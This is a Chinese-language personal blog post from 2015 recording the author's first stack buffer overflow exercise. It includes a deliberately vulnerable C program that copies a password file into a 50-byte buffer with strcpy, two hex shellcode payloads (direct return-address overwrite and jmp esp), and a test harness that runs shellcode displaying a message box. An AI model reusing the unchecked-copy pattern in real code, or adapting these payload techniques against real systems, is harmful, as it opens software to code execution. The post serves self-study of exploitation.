软件漏洞学习之缓冲区溢出(一)

by Netfairy - 2015-06-05

都说exploit是大牛集结之地,我刚开始学习,发现是真难啊!!!弄了半天,才实验成功我的第一个缓冲区溢出攻击

3.png

看到这个框框谈出来时,我眼泪都快掉下来了,真是不容易,折腾了半天,到现在还没明白,为啥原理那么简单,实现起来那么难,也许水平太菜了吧

不说了,先记些东西,源代码: 


#include<stdio.h>
#include<windows.h>
#include<string.h>
#define PASSWORD "1234567"
int verify_password(char *password)
{
	char buffer[50];
	strcpy(buffer,password);
	return 0;
}

int main()
{
	int flag=0;
	char password[1024];
	FILE * fp;
	LoadLibrary("user32.dll");
	fp=fopen("c:\\password.txt","r");
	if(fp==NULL)
	{
		MessageBox(NULL,"打开文件失败","error",NULL);
		exit(0);
	}
	fscanf(fp,"%s",password);
	flag=verify_password(password);
	if(flag)
	{
		printf("密码错误\n");
	}
	else
	{
		printf("密码正确\n");
	}
	fclose(fp);
	return 0;
}

shellcode:33DB536861697279684E6574668BC453505053B87664D377FFD090909090909090909090909090909090909090909090909090909090909038FB1200。EA这个是在我的机器测试,换台机器百分百失败,7664D377为本机MessageboxA地址,38FB1200为覆盖返回地址的shellcode地址

jmp esp方式:3132333435363738393132333435363738393132333435363738393132333435363738393132333435363738393132333435363731313131FC18D47733DB536861697279684E6574668BC453505053B87664D377FFD0。

FC18D477是jmp esp地址,绿色为shellcode


shellcode的调试: 

#include<stdio.h>
#include<windows.h>
char shellcode[]="\x33\xDB\x53\x68\x61\x69\x72\x79\x68\x4E\x65\x74\x66\x8B\xC4\x53\x50\x50\x53\xB8\x1E\xFD\x98\x75\xFF\xD0";

int main()
{
	LoadLibrary("user32.dll");
	_asm
	{
		lea eax,shellcode;
		push eax;
		ret;
	}
	return 0;
}
1EFD9875为本机MessageBox地址